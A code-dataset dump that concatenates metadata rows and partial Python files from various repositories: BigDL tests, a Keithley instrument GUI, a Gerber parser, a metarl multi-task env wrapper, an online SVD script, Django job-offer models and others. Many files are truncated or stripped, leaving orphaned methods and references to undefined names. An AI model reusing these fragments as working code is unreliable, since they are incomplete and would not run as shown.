| 29.659193 | 91 | 0.580738 |
620eed4cbd2619972703ee779c16c8a7ab6c7ba9 | 54 | py | Python | src/apps/startposes/models/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 27 | 2020-05-03T11:01:27.000Z | 2022-03-17T05:33:10.000Z | src/apps/startposes/models/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 54 | 2020-05-09T01:18:41.000Z | 2022-01-22T10:31:15.000Z | src/apps/startposes/models/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 9 | 2020-09-29T11:31:32.000Z | 2022-03-09T01:37:50.000Z | from .startpos import StartPos, StartPosCumWeightOnly
| 27 | 53 | 0.87037 |
620fe82f37b4b5c4aa7773e3305715688885bc0e | 8,342 | py | Python | python/chronos/test/bigdl/chronos/autots/test_tspipeline.py | joan726/BigDL | 2432f420418c8ccf02325f8677c94f291e112053 | [
"Apache-2.0"
] | 3 | 2021-07-14T01:28:47.000Z | 2022-03-02T01:16:32.000Z | python/chronos/test/bigdl/chronos/autots/test_tspipeline.py | liangs6212/BigDL | 3c89ff7e8bbdc713110536c18099506811cd2b3a | [
"Apache-2.0"
] | null | null | null | python/chronos/test/bigdl/chronos/autots/test_tspipeline.py | liangs6212/BigDL | 3c89ff7e8bbdc713110536c18099506811cd2b3a | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import tempfile
from unittest import TestCase
import pytest
import torch
from torch.utils.data import TensorDataset, DataLoader
from bigdl.chronos.autots import AutoTSEstimator, TSPipeline
from bigdl.orca.common import init_orca_context, stop_orca_context
if __name__ == "__main__":
    # Allow running this test module directly, outside the pytest CLI.
    pytest.main([__file__])
| 44.849462 | 90 | 0.532846 |
62112ee54eed681ca29c3d8ae3b4bec88531086a | 42,076 | py | Python | src/app/QKeithleySweep.py | mwchalmers/QKeithleyControl | 94e85cd8bc42d54f2cef4d0cfdb3ee4b62bcba41 | [
"MIT"
] | 6 | 2020-06-18T18:42:24.000Z | 2022-01-26T06:21:13.000Z | src/app/QKeithleySweep.py | mwchalmers/QKeithleyControl | 94e85cd8bc42d54f2cef4d0cfdb3ee4b62bcba41 | [
"MIT"
] | 1 | 2021-12-23T11:12:17.000Z | 2021-12-23T11:12:17.000Z | src/app/QKeithleySweep.py | mwchalmers/QKeithleyControl | 94e85cd8bc42d54f2cef4d0cfdb3ee4b62bcba41 | [
"MIT"
] | 3 | 2019-12-24T20:43:23.000Z | 2021-08-29T13:48:17.000Z | # ---------------------------------------------------------------------------------
# QKeithleySweep -> QVisaApplication
# Copyright (C) 2019 Michael Winters
# github: https://github.com/mesoic
# email: mesoic@protonmail.com
# ---------------------------------------------------------------------------------
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#!/usr/bin/env python
import os
import sys
import time
import threading
# Import numpy
import numpy as np
# Import QVisaApplication
from PyQtVisa import QVisaApplication
# Import PyQtVisa widgets
from PyQtVisa.widgets import QVisaUnitSelector
from PyQtVisa.widgets import QVisaDynamicPlot
# Import QT backends
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtGui import QIcon
# Container class to construct sweep measurement widget
| 30.824908 | 197 | 0.696811 |
62130b375ece64a9c0e907cb577ca9c4c8cd327e | 1,620 | py | Python | tests/fields/test_render.py | jpsca/pforms | 77c9da93e5224e79bb147aa873f28951e972bb21 | [
"MIT"
] | 2 | 2020-09-30T22:41:00.000Z | 2020-12-04T16:47:17.000Z | tests/fields/test_render.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | 2 | 2021-11-18T18:01:28.000Z | 2021-11-18T18:03:29.000Z | tests/fields/test_render.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | null | null | null | import proper_forms.fields as f
| 24.179104 | 75 | 0.588889 |
621340935801ad4caf2565122ba09adde8da7eaf | 30,832 | py | Python | gerber.py | BetaPollux/gerbex | aeb013da642135d28d809ddb07febc129219d297 | [
"MIT"
] | null | null | null | gerber.py | BetaPollux/gerbex | aeb013da642135d28d809ddb07febc129219d297 | [
"MIT"
] | null | null | null | gerber.py | BetaPollux/gerbex | aeb013da642135d28d809ddb07febc129219d297 | [
"MIT"
] | 1 | 2021-12-05T14:44:26.000Z | 2021-12-05T14:44:26.000Z | #!/usr/bin/python3
# RS-274X per standard Revision 2021.02
import re
import copy
import numpy as np
import vertices
# TODO replace all vertices with outline class
# Meant for extracting substrings only
# Cast to int or float will catch invalid strings
RE_INT = r'[+-]?[0-9]+'    # signed integer field
RE_DEC = r'[+-]?[0-9\.]+?'  # signed decimal field (non-greedy match)
# Exposure (polarity) flags: 1 draws, 0 erases -- presumably mirroring the
# aperture-macro exposure modifier of the RS-274X spec; confirm against
# the 2021.02 revision referenced at the top of the file.
EXPOSURE_ON = 1
EXPOSURE_OFF = 0
# TODO Arc needs quadrant mode
| 35.196347 | 95 | 0.570025 |
621341c710939a44f425e8019b3137c8dfb8ad3f | 3,558 | py | Python | angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 173d3ffa02146956e5f0c9c8862da56988fa67b2 | [
"BSD-2-Clause"
] | 474 | 2015-08-10T17:47:15.000Z | 2022-03-31T21:10:55.000Z | angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 173d3ffa02146956e5f0c9c8862da56988fa67b2 | [
"BSD-2-Clause"
] | 355 | 2015-08-17T09:35:53.000Z | 2022-03-31T21:29:52.000Z | angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 173d3ffa02146956e5f0c9c8862da56988fa67b2 | [
"BSD-2-Clause"
] | 95 | 2015-08-11T14:36:12.000Z | 2022-03-31T23:01:01.000Z | from functools import partial
from typing import Callable
from typing import TYPE_CHECKING
from ...config import Conf
from .menu import Menu, MenuEntry, MenuSeparator
if TYPE_CHECKING:
from ...ui.views.disassembly_view import DisassemblyView
| 36.306122 | 114 | 0.666948 |
621428e35c36b4c6fb3b8e653cb6dee70e33f859 | 2,787 | py | Python | src/panoptes/pocs/base.py | sarumanplaysguitar/POCS | b6c50cb70b8f3fc2147e975e5cd3cd953956da8d | [
"MIT"
] | null | null | null | src/panoptes/pocs/base.py | sarumanplaysguitar/POCS | b6c50cb70b8f3fc2147e975e5cd3cd953956da8d | [
"MIT"
] | null | null | null | src/panoptes/pocs/base.py | sarumanplaysguitar/POCS | b6c50cb70b8f3fc2147e975e5cd3cd953956da8d | [
"MIT"
] | null | null | null | from requests.exceptions import ConnectionError
from panoptes.pocs import __version__
from panoptes.utils.database import PanDB
from panoptes.utils.config import client
from panoptes.pocs.utils.logger import get_logger
from panoptes.pocs import hardware
# Global database.
# Module-level PanDB handle shared across instances; starts as None and is
# presumably created lazily on first use -- TODO confirm against the initializer.
PAN_DB_OBJ = None
| 35.278481 | 97 | 0.642985 |
62148220d3b68cf5b490d8e272125fd66f2e326e | 12,455 | py | Python | src/metarl/envs/multi_env_wrapper.py | icml2020submission6857/metarl | 9b66cefa2b6bcb6a38096d629ce8853b47c7171d | [
"MIT"
] | 2 | 2020-03-15T14:35:15.000Z | 2021-02-15T16:38:00.000Z | src/metarl/envs/multi_env_wrapper.py | icml2020submission6857/metarl | 9b66cefa2b6bcb6a38096d629ce8853b47c7171d | [
"MIT"
] | null | null | null | src/metarl/envs/multi_env_wrapper.py | icml2020submission6857/metarl | 9b66cefa2b6bcb6a38096d629ce8853b47c7171d | [
"MIT"
] | 1 | 2020-02-24T03:04:23.000Z | 2020-02-24T03:04:23.000Z | """A wrapper env that handles multiple tasks from different envs.
Useful while training multi-task reinforcement learning algorithms.
It provides observations augmented with one-hot representation of tasks.
"""
import random
import akro
import gym
import numpy as np
def round_robin_strategy(num_tasks, last_task=None):
    """Pick the next task id in round-robin order.

    Args:
        num_tasks (int): Total number of tasks.
        last_task (int): Previously sampled task, or None on the first draw.

    Returns:
        int: task id (0 when no task has been sampled yet).
    """
    return 0 if last_task is None else (last_task + 1) % num_tasks
def uniform_random_strategy(num_tasks, _):
    """Pick a task id uniformly at random.

    Args:
        num_tasks (int): Total number of tasks.
        _ (object): Ignored by this sampling strategy.

    Returns:
        int: task id in [0, num_tasks - 1].
    """
    # randrange(n) is exactly randint(0, n - 1), including the RNG stream.
    return random.randrange(num_tasks)
def step(self, action):
    """gym.Env step delegated to the currently active task env.

    Args:
        action (object): action forwarded to the active env's step()

    Returns:
        object: agent's observation, padded and prefixed with the task one-hot
        float: amount of reward returned after previous action
        bool: whether the episode has ended
        dict: auxiliary diagnostics, extended with 'task_id' and 'task_name'
    """
    raw_obs, reward, done, info = self.env.step(action)
    padded_obs = self._augment_observation(raw_obs)
    tagged_obs = self._obs_with_one_hot(padded_obs)
    info['task_id'] = self._active_task_index
    info['task_name'] = self._envs_names_list[self._active_task_index]
    return tagged_obs, reward, done, info
def close(self):
    """Close every wrapped task env."""
    for task_env in self._task_envs:
        task_env.close()
def _obs_with_one_hot(self, obs):
"""Concatenate active task one-hot representation with observation.
Args:
obs (numpy.ndarray): observation
Returns:
numpy.ndarray: active task one-hot + observation
"""
oh_obs = np.concatenate([self.active_task_one_hot, obs])
return oh_obs
# """A wrapper env that handles multiple tasks from different envs.
# Useful while training multi-task reinforcement learning algorithms.
# It provides observations augmented with one-hot representation of tasks.
# """
# import random
# import akro
# import gym
# import numpy as np
# def round_robin_strategy(num_tasks, last_task=None):
# """A function for sampling tasks in round robin fashion.
# Args:
# num_tasks (int): Total number of tasks.
# last_task (int): Previously sampled task.
# Returns:
# int: task id.
# """
# if last_task is None:
# return 0
# return (last_task + 1) % num_tasks
# def uniform_random_strategy(num_tasks, _):
# """A function for sampling tasks uniformly at random.
# Args:
# num_tasks (int): Total number of tasks.
# _ (object): Ignored by this sampling strategy.
# Returns:
# int: task id.
# """
# return random.randint(0, num_tasks - 1)
# class MultiEnvWrapper(gym.Wrapper):
# """A wrapper class to handle multiple gym environments.
# Args:
# envs (list(gym.Env)):
# A list of objects implementing gym.Env.
# sample_strategy (function(int, int)):
# Sample strategy to be used when sampling a new task.
# """
# def __init__(self, envs, sample_strategy=uniform_random_strategy):
# self._sample_strategy = sample_strategy
# self._num_tasks = len(envs)
# self._active_task_index = None
# self._observation_space = None
# max_flat_dim = np.prod(envs[0].observation_space.shape)
# max_observation_space_index = 0
# for i, env in enumerate(envs):
# assert len(env.observation_space.shape) == 1
# if np.prod(env.observation_space.shape) >= max_flat_dim:
# self.max_observation_space_index = i
# max_flat_dim = np.prod(env.observation_space.shape)
# self._max_plain_dim = max_flat_dim
# super().__init__(envs[self.max_observation_space_index])
# self._task_envs = []
# for i, env in enumerate(envs):
# if env.action_space.shape != self.env.action_space.shape:
# raise ValueError('Action space of all envs should be same.')
# self._task_envs.append(env)
# self.env.spec.observation_space = self._task_envs[self.max_observation_space_index].observation_space
# @property
# def num_tasks(self):
# """Total number of tasks.
# Returns:
# int: number of tasks.
# """
# return len(self._task_envs)
# @property
# def task_space(self):
# """Task Space.
# Returns:
# akro.Box: Task space.
# """
# one_hot_ub = np.ones(self.num_tasks)
# one_hot_lb = np.zeros(self.num_tasks)
# return akro.Box(one_hot_lb, one_hot_ub)
# @property
# def active_task_index(self):
# """Index of active task env.
# Returns:
# int: Index of active task.
# """
# return self._active_task_index
# @property
# def observation_space(self):
# """Observation space.
# Returns:
# akro.Box: Observation space.
# """
# task_lb, task_ub = self.task_space.bounds
# env_lb, env_ub = self._observation_space.bounds
# return akro.Box(np.concatenate([task_lb, env_lb]),
# np.concatenate([task_ub, env_ub]))
# @observation_space.setter
# def observation_space(self, observation_space):
# """Observation space setter.
# Args:
# observation_space (akro.Box): Observation space.
# """
# self._observation_space = observation_space
# @property
# def active_task_one_hot(self):
# """One-hot representation of active task.
# Returns:
# numpy.ndarray: one-hot representation of active task
# """
# one_hot = np.zeros(self.task_space.shape)
# index = self.active_task_index or 0
# one_hot[index] = self.task_space.high[index]
# return one_hot
# def reset(self, **kwargs):
# """Sample new task and call reset on new task env.
# Args:
# kwargs (dict): Keyword arguments to be passed to gym.Env.reset
# Returns:
# numpy.ndarray: active task one-hot representation + observation
# """
# self._active_task_index = self._sample_strategy(
# self._num_tasks, self._active_task_index)
# self.env = self._task_envs[self._active_task_index]
# obs = self.env.reset(**kwargs)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# return oh_obs
# def step(self, action):
# """gym.Env step for the active task env.
# Args:
# action (object): object to be passed in gym.Env.reset(action)
# Returns:
# object: agent's observation of the current environment
# float: amount of reward returned after previous action
# bool: whether the episode has ended
# dict: contains auxiliary diagnostic information
# """
# obs, reward, done, info = self.env.step(action)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# info['task_id'] = self._active_task_index
# return oh_obs, reward, done, info
# def _augment_observation(self, obs):
# # optionally zero-pad observation
# if np.prod(obs.shape) < self._max_plain_dim:
# zeros = np.zeros(
# shape=(self._max_plain_dim - np.prod(obs.shape),)
# )
# obs = np.concatenate([obs, zeros])
# return obs
# def close(self):
# """Close all task envs."""
# for env in self._task_envs:
# env.close()
# def _obs_with_one_hot(self, obs):
# """Concatenate active task one-hot representation with observation.
# Args:
# obs (numpy.ndarray): observation
# Returns:
# numpy.ndarray: active task one-hot + observation
# """
# oh_obs = np.concatenate([self.active_task_one_hot, obs])
# return oh_obs
| 29.305882 | 111 | 0.607226 |
6214cfd0d71589122131f56a39aa2ef13d007862 | 773 | py | Python | MyNewHandTracking.py | Hai-Hoang-88/HandTracking | c35cf442c4305a48ac1182570c266df4d3b877dd | [
"Unlicense"
] | null | null | null | MyNewHandTracking.py | Hai-Hoang-88/HandTracking | c35cf442c4305a48ac1182570c266df4d3b877dd | [
"Unlicense"
] | null | null | null | MyNewHandTracking.py | Hai-Hoang-88/HandTracking | c35cf442c4305a48ac1182570c266df4d3b877dd | [
"Unlicense"
] | null | null | null | import cv2
import mediapipe as mp
import time
import HandTracking_module as htm
# initiate time: state for the frames-per-second overlay
pTime = 0
cTime = 0

cap = cv2.VideoCapture(0)  # 0 is internal camera, while 1 is external camera
detector = htm.handDetector()

# Capture loop: detect the hand, print landmark 4 (thumb tip) and draw the FPS.
while True:
    success, img = cap.read()
    img = detector.findHands(img)  # get para img and put in definition
    lmList = detector.findPosition(img, draw=False)  # if no draw=True, will draw a circle
    if lmList:
        print(lmList[4])
    # FPS from the elapsed time since the previous frame
    cTime = time.time()
    fps = 1 / (cTime - pTime)
    pTime = cTime
    # overlay the FPS counter on the frame
    cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_ITALIC, 3,
                (255, 0, 255), 3)
    cv2.imshow("Image", img)
    cv2.waitKey(1)
62170b104a1052dcd0eae68ee028a14da9c51172 | 2,113 | py | Python | exercises/en/solution_07_23.py | hfboyce/MCL-DSCI-571-machine-learning | 25757369491ac547daa94ff1143ca7389d433a6e | [
"MIT"
] | 1 | 2020-09-12T15:40:11.000Z | 2020-09-12T15:40:11.000Z | exercises/en/solution_07_23.py | hfboyce/MCL-DSCI-571-machine-learning | 25757369491ac547daa94ff1143ca7389d433a6e | [
"MIT"
] | 13 | 2020-10-02T16:48:24.000Z | 2020-12-09T18:58:21.000Z | exercises/en/solution_07_23.py | hfboyce/MCL-DSCI-571-machine-learning | 25757369491ac547daa94ff1143ca7389d433a6e | [
"MIT"
] | 2 | 2020-10-28T19:43:42.000Z | 2021-03-30T22:57:47.000Z | import numpy as np
import pandas as pd
import warnings

# Silence pandas/sklearn FutureWarnings so the solution output stays clean.
warnings.simplefilter(action='ignore', category=FutureWarning)

from sklearn.model_selection import train_test_split, cross_validate
from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer, make_column_transformer
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.svm import SVC

# Loading in the data
pk_df = pd.read_csv('data/pokemon.csv')

# 80/20 train/test split; fixed random_state keeps the grading reproducible.
train_df, test_df = train_test_split(pk_df, test_size=0.2, random_state=1)

# Target column is `legendary`; everything else is a feature.
X_train = train_df.drop(columns=['legendary'])
y_train = train_df['legendary']
X_test = test_df.drop(columns=['legendary'])
y_test = test_df['legendary']

# Columns routed to each preprocessing branch below.
numeric_features = ["deck_no",
                    "attack",
                    "defense" ,
                    "sp_attack",
                    "sp_defense",
                    "speed",
                    "capture_rt",
                    "total_bs"]
categorical_features = ["type"]

# Numeric branch: median imputation then standardization.
numeric_transformer = make_pipeline(SimpleImputer(strategy="median"), StandardScaler())
# Categorical branch: most-frequent imputation then one-hot encoding;
# handle_unknown="ignore" avoids errors on unseen categories at predict time.
categorical_transformer = make_pipeline(
    SimpleImputer(strategy="most_frequent"),
    OneHotEncoder(handle_unknown="ignore"))
preprocessor = make_column_transformer(
    (numeric_transformer, numeric_features),
    (categorical_transformer, categorical_features))

# Build a pipeline containing the column transformer and an SVC model
# Use the parameter class_weight="balanced"
# Name this pipeline main_pipe
main_pipe = make_pipeline(preprocessor, SVC(class_weight="balanced"))

# Perform cross validation on the training split using the scoring measures accuracy, precision and recall
# Save the results in a dataframe named multi_scores
multi_scores = pd.DataFrame(cross_validate(main_pipe,
                                           X_train,
                                           y_train,
                                           return_train_score=True,
                                           scoring = ['accuracy', 'precision', 'recall']))
multi_scores
| 37.732143 | 107 | 0.681496 |
6217c3865432b1a663db3913c183c3b2bdd9e8cf | 53 | py | Python | src/algorithm/__init__.py | ShogoAkiyama/metaworld.pytorch | 6b08163d2c0d73b6d1d9b4b513d18f0a308e92c4 | [
"MIT"
] | null | null | null | src/algorithm/__init__.py | ShogoAkiyama/metaworld.pytorch | 6b08163d2c0d73b6d1d9b4b513d18f0a308e92c4 | [
"MIT"
] | null | null | null | src/algorithm/__init__.py | ShogoAkiyama/metaworld.pytorch | 6b08163d2c0d73b6d1d9b4b513d18f0a308e92c4 | [
"MIT"
] | null | null | null | from .sac import SAC
from .eval import EvalAlgorithm
| 17.666667 | 31 | 0.811321 |
6218792313b28bf05b712a8e421f24aaaa0f9100 | 8,110 | py | Python | Parallel_POD/online_svd_parallel.py | Romit-Maulik/Tutorials-Demos-Practice | a58ddc819f24a16f7059e63d7f201fc2cd23e03a | [
"MIT"
] | 8 | 2020-09-02T14:46:07.000Z | 2021-11-29T15:27:05.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 18 | 2020-11-13T18:49:33.000Z | 2022-03-12T00:54:43.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 5 | 2019-09-25T23:57:00.000Z | 2021-04-18T08:15:34.000Z | import numpy as np
np.random.seed(10)
import matplotlib.pyplot as plt
from mpi4py import MPI
# For shared memory deployment: `export OPENBLAS_NUM_THREADS=1`
# Method of snapshots
def generate_right_vectors(A, eps=1e-4):
    '''
    Method of snapshots: truncated right singular vectors of a snapshot matrix.

    A   - Snapshot matrix - shape: NxS
    eps - singular values below this threshold are truncated (default keeps the
          original hard-coded 1e-4 cutoff)

    returns (V, svals):
    V     - covariance eigenvectors (right singular vectors), shape (S, r)
    svals - the r retained singular values, sorted in descending order

    BUGFIXES vs. the original:
    * np.linalg.eigh replaces np.linalg.eig: A^T A is symmetric, so eigh is
      exact (real output) and cheaper; eigenpairs are then explicitly sorted
      in descending order, which the threshold scan below requires.
    * when no singular value falls below eps, np.argmax(mask) used to return 0
      and truncate everything; now the full rank is kept instead.
    '''
    cov = A.T @ A
    # eigh returns eigenvalues in ascending order for a symmetric matrix.
    w, v = np.linalg.eigh(cov)
    order = np.argsort(w)[::-1]
    w = w[order]
    v = v[:, order]
    # abs() guards against tiny negative eigenvalues from round-off.
    svals = np.sqrt(np.abs(w))
    below = svals < eps  # eps0
    rank = int(np.argmax(below)) if below.any() else svals.shape[0]
    return v[:, :rank], svals[:rank]  # Covariance eigenvectors, singular values
# Randomized SVD to accelerate
# Check orthogonality
if __name__ == '__main__':
    from time import time
    # Initialize timer
    start_time = time()
    # 10 modes, forgetting factor 1.0, low-rank updates on.
    # NOTE(review): constructor signature inferred from this call site -- confirm.
    test_class = online_svd_calculator(10,1.0,low_rank=True)
    # Seed the decomposition with this MPI rank's first batch of snapshots.
    iteration = 0
    data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
    test_class.initialize(data)
    # Stream the remaining batches through the incremental update.
    for iteration in range(1,4):
        data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
        test_class.incorporate_data(data)
    end_time = time()
    print('Time required for parallel streaming SVD (each rank):', end_time-start_time)
    # Collect the distributed modes onto the root rank.
    test_class.gather_modes()
62190035d82be78029e09978dd1bef9d1d34feb6 | 12,887 | py | Python | joboffers/models.py | Devecoop/pyarweb | ee42f0aa871569cc30a6a678dcdc43293d38c0bb | [
"Apache-2.0"
] | 1 | 2022-01-14T18:38:25.000Z | 2022-01-14T18:38:25.000Z | joboffers/models.py | Devecoop/pyarweb | ee42f0aa871569cc30a6a678dcdc43293d38c0bb | [
"Apache-2.0"
] | 37 | 2022-01-17T14:41:51.000Z | 2022-02-16T13:50:05.000Z | joboffers/models.py | Devecoop/pyarweb | ee42f0aa871569cc30a6a678dcdc43293d38c0bb | [
"Apache-2.0"
] | null | null | null | import html
import json
import re
from datetime import date
from autoslug import AutoSlugField
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.core.validators import MinLengthValidator
from django.db.models.aggregates import Count
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from django.utils.timezone import now
from django.utils.translation import gettext as _
from easyaudit.models import CRUDEvent
from taggit_autosuggest.managers import TaggableManager
from pycompanies.models import UserCompanyProfile
from .constants import STATE_LABEL_CLASSES
def get_publisher_mail_addresses(self):
    """
    Return the email addresses of the publishers of this offer, i.e. the
    users whose company profile matches the offer's company.

    Users with an empty email field are filtered out.

    :return: set of email address strings
    """
    company_profiles = UserCompanyProfile.objects.filter(company=self.company)
    return {profile.user.email for profile in company_profiles if profile.user.email}
def get_visualizations_count(self):
    """
    Get a dict with visualizations count for every kind of event.

    :return: dict mapping event_type value -> number of access-log rows
             recorded for this offer with that event type
    """
    # Group the access log by event_type and count rows per group; the
    # trailing empty .order_by() clears any default ordering so it does not
    # pollute the GROUP BY clause.
    items = JobOfferAccessLog.objects \
        .filter(joboffer=self) \
        .values_list('event_type') \
        .annotate(total=Count('event_type')) \
        .order_by()
    # values_list + annotate yields (event_type, total) pairs
    return dict(items)
def save(self, *args, **kwargs):
    """
    Persist the offer, refreshing the slug from the title and filling in a
    short description from the long description when it is empty.
    """
    # Regenerated on every save, so slug tracks title changes.
    self.slug = slugify(self.title)
    if not self.short_description:
        self.short_description = self.get_short_description(self.description)
    super().save(*args, **kwargs)
class CommentType(models.TextChoices):
    """
    Choices for Types of JobOfferComments.
    """
    # BUGFIX: the Spanish labels had mangled encoding (accented characters
    # were dropped: 'Moderacin', 'Edicin', 'Informacin'); restored them.
    MODERATION = 'MODERATION', _('Moderación')
    EDITION = 'EDITION', _('Edición')
    SPAM = 'SPAM', _('Spam')
    INSUFICIENT = 'INSUFICIENT', _('Información insuficiente')
    NOT_RELATED = 'NOT_PYTHON', _('Oferta no relacionada con Python')
class JobOfferComment(models.Model):
    """
    A comment on a JobOffer (moderation feedback, edition notes, etc.).
    """

    # Free-form body of the comment.
    text = models.TextField(verbose_name=_('Texto'))
    # One of CommentType.choices.
    comment_type = models.CharField(
        max_length=32, choices=CommentType.choices, verbose_name=_('Tipo'))
    # FIX: verbose_name previously read _('Rango salarial') ("salary
    # range"), clearly copy-pasted from an unrelated field; this is the
    # creation timestamp of the comment.
    created_at = models.DateTimeField(
        auto_now_add=True, verbose_name=_('Fecha de creación')
    )
    created_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
        verbose_name=_('Creado por'),
        related_name='created_joboffer_comments',
    )
    # Deleting the offer cascades to its comments.
    joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)
class JobOfferHistoryManager(models.Manager):
    """Manager that scopes audit-log entries to a particular job offer."""

    def for_offer(self, joboffer):
        """
        Get all the history objects for a given joboffer. It can be JobOffer
        and JobOfferComment events.
        """
        queryset = super().get_queryset()

        joboffer_ctype = ContentType.objects.get(
            app_label='joboffers', model='joboffer'
        )
        comment_ctype = ContentType.objects.get(
            app_label='joboffers', model='joboffercomment'
        )

        # Events logged directly on the offer. event_type__lt=4 presumably
        # restricts to the CRUD event kinds — confirm against
        # easyaudit.models.CRUDEvent's event-type constants.
        offer_events = models.Q(
            event_type__lt=4, object_id=joboffer.id, content_type=joboffer_ctype
        )

        # Events logged on any comment belonging to the offer.
        comment_ids = [
            comment.id for comment in joboffer.joboffercomment_set.all()
        ]
        comment_events = models.Q(
            object_id__in=comment_ids, content_type=comment_ctype
        )

        return queryset.filter(offer_events | comment_events)
class JobOfferHistory(CRUDEvent):
    """
    Proxy model over easyaudit's CRUDEvent that scopes the audit log to
    job offers, taking that filtering logic out of the controller.
    """

    # Custom manager providing for_offer() (see JobOfferHistoryManager).
    objects = JobOfferHistoryManager()

    class Meta:
        # Proxy: no new table, only the manager/behaviour differs.
        proxy = True
class JobOfferAccessLog(models.Model):
    """
    Model to track visualization events of joboffers.
    """

    created_at = models.DateTimeField(default=now)
    # Integer encoding of the period (month and year) the event belongs
    # to; the exact packing scheme is defined by the writer code, which
    # is not visible here.
    month_and_year = models.PositiveIntegerField()
    # One of EventType.choices (EventType is declared elsewhere in this
    # module).
    event_type = models.PositiveSmallIntegerField(
        choices=EventType.choices, verbose_name=_('Tipo de Evento')
    )
    # FIX: restored the accented label 'Sesión' — it had been mangled to
    # 'Sesin' by a bad encoding round-trip. 40 chars fits a session key.
    session = models.CharField(max_length=40, verbose_name=_('Identificador de Sesión'))
    joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)
| 32.298246 | 96 | 0.632575 |
621946fa869b479764d5f279c948e790f062b5f0 | 32,670 | py | Python | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 29 | 2020-07-28T03:11:21.000Z | 2022-03-09T04:37:47.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 8 | 2020-08-19T06:40:42.000Z | 2022-03-07T03:48:57.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 7 | 2020-07-20T09:05:17.000Z | 2021-11-26T13:04:25.000Z | # --------------------------------------------------------
# Tensorflow VCL
# Licensed under The MIT License [see LICENSE for details]
# Written by Zhi Hou, based on code from Transferable-Interactiveness-Network, Chen Gao, Zheqi he and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.python.framework import ops
from ult.tools import get_convert_matrix
from ult.config import cfg
from ult.visualization import draw_bounding_boxes_HOI
import numpy as np
| 52.949757 | 158 | 0.589654 |
621b663ff688adbcc08ffd8203aafeded181974f | 7,738 | py | Python | nova_powervm/tests/virt/powervm/test_mgmt.py | openstack/nova-powervm | 376d9493e2a10313068508daf9054d7ecf6d121f | [
"Apache-2.0"
] | 24 | 2015-10-18T02:55:20.000Z | 2021-11-17T11:43:51.000Z | nova_powervm/tests/virt/powervm/test_mgmt.py | openstack/nova-powervm | 376d9493e2a10313068508daf9054d7ecf6d121f | [
"Apache-2.0"
